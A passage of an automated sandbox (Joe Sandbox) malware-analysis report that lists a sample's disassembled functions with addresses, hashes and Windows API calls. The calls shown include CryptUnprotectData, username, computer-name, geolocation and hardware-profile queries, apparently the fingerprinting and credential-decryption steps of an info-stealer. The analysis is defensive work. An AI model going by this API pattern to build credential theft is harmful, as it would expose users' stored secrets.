Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: e348b407159665c0f8fbb4d8ae1b556ab5aa64807e7462d9f8f7a3caa83c6de8
Instruction ID: a802ae5077c7000b9d4c0be7c0625326516fd6674560b729698d35c2806b899c
Opcode Fuzzy Hash: e348b407159665c0f8fbb4d8ae1b556ab5aa64807e7462d9f8f7a3caa83c6de8
Instruction Fuzzy Hash: 0171C4B1A006189BDB34DF24DC44BAAB7F9FF44304F40469DE649A7681E770AAC4CFA4

Function 00DE6360 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 429COMMON

Download Yara Rule

APIs

GetCurrentHwProfileW.ADVAPI32(?), ref: 00DE63CB
EnumDisplayDevicesW.USER32(00000000,00000000,00000348,00000001), ref: 00DE67C6

Part of subcall function 00DD8840: CryptUnprotectData.CRYPT32(AA85FA48,00000000,00000000,00000000,00000000,00000001,?), ref: 00DD8A50

Part of subcall function 00DE1250: GetModuleHandleW.KERNEL32(ntdll.dll,AA85FA48), ref: 00DE130F
Part of subcall function 00DE1250: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 00DE131F
Part of subcall function 00DE1250: GetNativeSystemInfo.KERNEL32(?,00E2BB63,00000000), ref: 00DE139D

Part of subcall function 00DE0E60: GetUserNameW.ADVAPI32(?,?), ref: 00DE0E9E

Part of subcall function 00DE0F00: GetComputerNameW.KERNEL32(?,?), ref: 00DE0F3E

Strings

Unknown, xrefs: 00DE647A

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Name$AddressComputerCryptCurrentDataDevicesDisplayEnumHandleInfoModuleNativeProcProfileSystemUnprotectUser
String ID: Unknown
API String ID: 509233729-1654365787
Opcode ID: 8cf9afc6c533a24e31339f4e9ec1b313272d015febe30e54de7cc713ecba66a0
Instruction ID: 5554a0ce50ae3b741bef07ec8ed42f168255ede47f2494beb5665ecbc18d05bc
Opcode Fuzzy Hash: 8cf9afc6c533a24e31339f4e9ec1b313272d015febe30e54de7cc713ecba66a0
Instruction Fuzzy Hash: 74125870E006688FDB25DF69CD847EEBBB5EB58300F1481A9D819B7241D730AE85CFA0

Function 00E04612 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 156timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00E00703: RtlFreeHeap.NTDLL(00000000,00000000,?,00E0807B,?,00000000,?,?,00E0831C,?,00000007,?,?,00E06AFA,?,?), ref: 00E00719
Part of subcall function 00E00703: GetLastError.KERNEL32(?,?,00E0807B,?,00000000,?,?,00E0831C,?,00000007,?,?,00E06AFA,?,?), ref: 00E00724

GetTimeZoneInformation.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00E047C5,00000000,00000000,00000000), ref: 00E04684

Strings

Eastern Summer Time, xrefs: 00E04731
Eastern Standard Time, xrefs: 00E0471D

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3335090040-239921721
Opcode ID: f5f30128f86bc59bdd1b4273f5af7a8bf4a390c98061f300bb0511c56a24c0fa
Instruction ID: 8e50333e18d81130fe239d023ab07e8ee6c4b479487cea1db16f6efbc6b43df8
Opcode Fuzzy Hash: f5f30128f86bc59bdd1b4273f5af7a8bf4a390c98061f300bb0511c56a24c0fa
Instruction Fuzzy Hash: 9741D8F1900215AFCB20BF75DD4698ABFF8EF06710B1561A6F554B71E1EB309A84CB90

Function 00DD1320 Relevance: 4.6, APIs: 3, Instructions: 133COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00DD140B
___std_exception_copy.LIBVCRUNTIME ref: 00DD143F
___std_exception_copy.LIBVCRUNTIME ref: 00DD1466

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ___std_exception_copy$Concurrency::cancel_current_task
String ID:
API String ID: 3727464891-0
Opcode ID: ae2c2245d5aab6527436f30dedd7da9b121d7bbc0d6444c6a015e38b72eb544e
Instruction ID: 4682e37111697bf5fd752d625082df8edf0f74aacee8d09aff1bea452d348892
Opcode Fuzzy Hash: ae2c2245d5aab6527436f30dedd7da9b121d7bbc0d6444c6a015e38b72eb544e
Instruction Fuzzy Hash: FC41F2B6A04305ABC704DF69D84169AB3E8FF54310B14472BE81597741EB71E99087B1

Function 00DE05B0 Relevance: 4.6, APIs: 3, Instructions: 64COMMON

Download Yara Rule

APIs

GetUserGeoID.KERNEL32(00000010), ref: 00DE05E5
GetGeoInfoA.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00DE05F7
GetGeoInfoA.KERNEL32(?,00000004,?,00000000,00000000), ref: 00DE064F

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Info$User
String ID:
API String ID: 2017065092-0
Opcode ID: 6c9b0f1dde0d02dd6903c6d0677d0187fbb3120be611003dfb55362b2412aaa5
Instruction ID: 62a5ca418cb994dbe0de6a53ec8825ec3947a005d003e8948e5c293ed877620d
Opcode Fuzzy Hash: 6c9b0f1dde0d02dd6903c6d0677d0187fbb3120be611003dfb55362b2412aaa5
Instruction Fuzzy Hash: EE216A70A40305ABE7208F65CC09B5BBBF8EB44B14F100A1EF201AB2C0D7B565488BA1

Function 00DF53DE Relevance: 4.6, APIs: 3, Instructions: 51threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_00065282,00000000,00000000,00000000), ref: 00DF5427
GetLastError.KERNEL32(?,?,?,?,00DD9B51,00000000,00000000), ref: 00DF5433
__dosmaperr.LIBCMT ref: 00DF543A

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: CreateErrorLastThread__dosmaperr
String ID:
API String ID: 2744730728-0
Opcode ID: 504adfbbd69fda12d74672330323a04ae6211d02759a11fce65a14dbe0489deb
Instruction ID: 90e78f1951472584442ddf538f77ce9959b1995717cd50ef3990b4a43d7215f5
Opcode Fuzzy Hash: 504adfbbd69fda12d74672330323a04ae6211d02759a11fce65a14dbe0489deb
Instruction Fuzzy Hash: 96018C7251060DAFDF159FA4EC06ABE3BA8EF00355F06C158FB02A6194DB71CA50DBB0

Function 00DF5337 Relevance: 4.5, APIs: 3, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00DFD382: GetLastError.KERNEL32(00000000,?,00DFCBF8,00E00C7F,?,?,00DFD27E,00000001,00000364,?,00000006,000000FF,?,00DF52A7,00E33790,0000000C), ref: 00DFD386
Part of subcall function 00DFD382: SetLastError.KERNEL32(00000000), ref: 00DFD428

CloseHandle.KERNEL32(?,?,?,00DF546E,?,?,00DF52E0,00000000), ref: 00DF5368
FreeLibraryAndExitThread.KERNEL32(?,?,?,?,00DF546E,?,?,00DF52E0,00000000), ref: 00DF537E
ExitThread.KERNEL32 ref: 00DF5387

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ErrorExitLastThread$CloseFreeHandleLibrary
String ID:
API String ID: 1991824761-0
Opcode ID: f8cbaffade2f3d1190b7181ed5cd78790f96a1f2a70cfc16abfc98e2cb28d67e
Instruction ID: d2193c85ed5d4fdcb6b560ce22666ccfcc88978f41a9b975cdd470b9ace38654
Opcode Fuzzy Hash: f8cbaffade2f3d1190b7181ed5cd78790f96a1f2a70cfc16abfc98e2cb28d67e
Instruction Fuzzy Hash: F6F03031100E086FDB255BA9A808F7A3AD9AF003A5F1FCA54FB25964E5D760DD458770

Function 00E00E59 Relevance: 4.5, APIs: 3, Instructions: 15COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000002,?,00E00E53,00DFCEF2,00DFCEF2,?,00000002,AA85FA48,00DFCEF2,00000002), ref: 00E00E6A
TerminateProcess.KERNEL32(00000000,?,00E00E53,00DFCEF2,00DFCEF2,?,00000002,AA85FA48,00DFCEF2,00000002), ref: 00E00E71
ExitProcess.KERNEL32 ref: 00E00E83

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: f70387641a4284849991325ec0d6758f517c69dd1533482f9c65148da769a79d
Instruction ID: 311403c14450bdcfe68f936ccf6050431d8700a1e75e8477f605c9631a086ec4
Opcode Fuzzy Hash: f70387641a4284849991325ec0d6758f517c69dd1533482f9c65148da769a79d
Instruction Fuzzy Hash: 47D09E31004108AFDF512F61DC0DF5D3F66BF40345F445824B949760B2CB329997DA90

Function 00DD7E90 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 313COMMON

Download Yara Rule

Strings

j, xrefs: 00DD7F7F

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID:
String ID: j
API String ID: 0-1273469241
Opcode ID: 58af4332bdc68cba074db89a8f46ddab6d016cb9d74836d6966209ced73a0d03
Instruction ID: 94630879fdac284ce9130a5db7c37440a67186a3e2cea50ab53c4f9fe51ef143
Opcode Fuzzy Hash: 58af4332bdc68cba074db89a8f46ddab6d016cb9d74836d6966209ced73a0d03
Instruction Fuzzy Hash: 63B1B371D002089BDB15DFA8C885BADFBF5EF48310F24416EE915A7791EB34AA45CBB0

Function 00DF0AC0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 293COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00DF0CE7

Strings

number overflow parsing ', xrefs: 00DF0D87

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: number overflow parsing '
API String ID: 118556049-3802681121
Opcode ID: f1e33bed2217ea62b1fd024e3f80c62d371fa1ea5e1aeeea4c3f59e84e07e110
Instruction ID: 11ab8d677e19c1b06d77504686a2258bbae94c74f600891b722fe085128ecd0b
Opcode Fuzzy Hash: f1e33bed2217ea62b1fd024e3f80c62d371fa1ea5e1aeeea4c3f59e84e07e110
Instruction Fuzzy Hash: E4A1D171A002099FCB18CF28C84077ABBF5FF05314F298769E9659B382D731E945CBA0

Function 00DE82D0 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 175COMMON

Download Yara Rule

Strings

, xrefs: 00DE833E

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e363e004baaf9aa4f74822eb2301230b722e37287931cdc1b104b6144e399064
Instruction ID: 64dbc8774dfbd8cea743d50ea0005f94148bb44160b138442e0a6e58d6aae2d1
Opcode Fuzzy Hash: e363e004baaf9aa4f74822eb2301230b722e37287931cdc1b104b6144e399064
Instruction Fuzzy Hash: AC51A27560064ADFC718DF69C4C0A99F7E1FF09320B18426AE859CBB91DB31ED60DBA0

Function 00DE0DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 00DF4B7A: GetSystemTimeAsFileTime.KERNEL32(00DDA0DB,?,?,?,?,?,00DDA0DB,00000000,00000002,00000005,00000001,00000006), ref: 00DF4B8F
Part of subcall function 00DF4B7A: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DF4BAE

_strftime.LIBCMT ref: 00DE0E11

Strings

%d-%m-%Y, %H:%M:%S, xrefs: 00DE0E06

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Time$FileSystemUnothrow_t@std@@@__ehfuncinfo$??2@_strftime
String ID: %d-%m-%Y, %H:%M:%S
API String ID: 1658271636-3495478971
Opcode ID: 6d08624d21e9567ad3098a59f1914ccb08f899ac9712c02fc32d56139d6287f3
Instruction ID: e5ef911c6cbb709206747baeff941a3e7a1f9e75507f556f60e33a3fa6c11fc5
Opcode Fuzzy Hash: 6d08624d21e9567ad3098a59f1914ccb08f899ac9712c02fc32d56139d6287f3
Instruction Fuzzy Hash: ED01A171D0024C9ACB11EFE4C841AFEBBBCEF04700F10865EE541A7241EB756A498BE0

Function 00DD39A0 Relevance: 3.3, APIs: 2, Instructions: 274COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00DD3AD5

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 5c8b1b6e67e8f67c6ab61ab76cc089c4cef61ea0100a6b36e4fbfc78b56c0c48
Instruction ID: a29f4241cc35a640db0e5a5a39687e677521bdb9409d52936527a73be5b4a057
Opcode Fuzzy Hash: 5c8b1b6e67e8f67c6ab61ab76cc089c4cef61ea0100a6b36e4fbfc78b56c0c48
Instruction Fuzzy Hash: B0815A32E001199BCB19DF6CDC815AEB7E5EF84350B1942BAE859EB342D630DE5187F2

Function 00DDE920 Relevance: 3.1, APIs: 2, Instructions: 53COMMON

Download Yara Rule

APIs

SHGetKnownFolderPath.SHELL32(00E27070,00000000,00000000,?), ref: 00DDE992
CoTaskMemFree.OLE32(?), ref: 00DDE9AA

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: FolderFreeKnownPathTask
String ID:
API String ID: 969438705-0
Opcode ID: 9044c2678f4147f69a0b1d5e8b7d2914559c28605ee61c177b07e5a044b73614
Instruction ID: 1ae2c0e1d40470b842ff83d5be9ff710fd18457f4dab56f2adf3737bca95d472
Opcode Fuzzy Hash: 9044c2678f4147f69a0b1d5e8b7d2914559c28605ee61c177b07e5a044b73614
Instruction Fuzzy Hash: 2A116D71A003099FDB20DF65C905BABBBF8FF08704F104A1EE415A3690D7B56A448B91

Function 00E036CE Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNEL32(00000000,00000000,00E33870,00E15542,00000002,00E15542,00000000,?,?,?,00E037D8,00000000,?,00E15542,00000002,00E33870), ref: 00E0370A
GetLastError.KERNEL32(00E15542,?,?,?,00E037D8,00000000,?,00E15542,00000002,00E33870,00000000,00E15542,00000000,00E33870,0000000C,00DF866B), ref: 00E03717

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: ebe5b734e0964391c91d441fe834c5fc46a504a272b0523c29d88a62f902f400
Instruction ID: b9f22bf906c6bcddc29f57b59da15fe52c3a46726f2b7c92cb4bb1a85c712929
Opcode Fuzzy Hash: ebe5b734e0964391c91d441fe834c5fc46a504a272b0523c29d88a62f902f400
Instruction Fuzzy Hash: D1012672614158AFCB15CF69DC0AC9E3B29EB84320F240109F811BB2E1E672EE91CB90

Function 00DF5282 Relevance: 3.0, APIs: 2, Instructions: 38threadCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00E33790,0000000C), ref: 00DF5295
ExitThread.KERNEL32 ref: 00DF529C

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ErrorExitLastThread
String ID:
API String ID: 1611280651-0
Opcode ID: d5f1123ea6a48b2c34c28809952390d9f7aed6bc33016192f3455281faca7a2e
Instruction ID: f3b5ca665871d4a5a65f8b067e460a01906638324d7d742605571ee54e7cbf7e
Opcode Fuzzy Hash: d5f1123ea6a48b2c34c28809952390d9f7aed6bc33016192f3455281faca7a2e
Instruction Fuzzy Hash: F1F0C271A00608EFEB11ABB0D80AF7E7B75EF04710F154149F601BB2A2CB345986DBB0

Function 00E00703 Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000000,00000000,?,00E0807B,?,00000000,?,?,00E0831C,?,00000007,?,?,00E06AFA,?,?), ref: 00E00719
GetLastError.KERNEL32(?,?,00E0807B,?,00000000,?,?,00E0831C,?,00000007,?,?,00E06AFA,?,?), ref: 00E00724

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: 300532a7198dd178378279c6f0ed38ac20e3690ab4e595943a1c5533ecda9e5a
Instruction ID: e764dadb301685d0986e7be2d162857b2a251f6b55ab5d612e55018a1ed1e5dc
Opcode Fuzzy Hash: 300532a7198dd178378279c6f0ed38ac20e3690ab4e595943a1c5533ecda9e5a
Instruction Fuzzy Hash: B2E0863110420CAFEB212BA5AC09F553B58EB44395F159411F708AA1A1CB3598A0CBE4

Function 00E02636 Relevance: 1.7, APIs: 1, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66d599a79915f02b067fd2cb8a701f11ddb53414fb0596e34e8cad26a5bcac7c
Instruction ID: f61e28dc4c7d25daa77123456ee72b384c4928af165a0d124cf057a1c17f1524
Opcode Fuzzy Hash: 66d599a79915f02b067fd2cb8a701f11ddb53414fb0596e34e8cad26a5bcac7c
Instruction Fuzzy Hash: DE519374A00108AFDF14CF58C889AA97FF1EF59324F29915DF9496B292D272DEC1CB90

Function 00DE0FA0 Relevance: 1.7, APIs: 1, Instructions: 152COMMON

Download Yara Rule

APIs

Part of subcall function 00DDEF90: ___std_fs_get_current_path@8.LIBCPMT ref: 00DDF033

GetVolumeInformationW.KERNEL32(00000000,?,00000100,?,?,?,?,00000100,AA85FA48,?), ref: 00DE1039

Part of subcall function 00DE0D00: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00DE0DA5

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: InformationIos_base_dtorVolume___std_fs_get_current_path@8std::ios_base::_
String ID:
API String ID: 3920510466-0
Opcode ID: 46e0c46e799731974e2b726232f185dc975985dd01fdf88c0c8e545f77b8feb4
Instruction ID: 6187cdfadbedb88b066a9ee842049199311a7fd95d30d0698d547c60fef64061
Opcode Fuzzy Hash: 46e0c46e799731974e2b726232f185dc975985dd01fdf88c0c8e545f77b8feb4
Instruction Fuzzy Hash: 41717C718012599BDB24DF24CC99BEAB7B4FF04304F1046E9E45967291DBB46BC8CFA0

Function 00DD4660 Relevance: 1.6, APIs: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 00DD47B4

Memory Dump Source

Source File: 00000003.00000002.2260877248.0000000000D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000003.00000002.2260847333.0000000000D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2260953393.0000000000E20000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261011137.0000000000E36000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2261054654.0000000000E39000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d90000_api.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 5c67969e0850813bcbd20a94ffb59b4834a1594f9cdca26fa019d3763ce1f86b
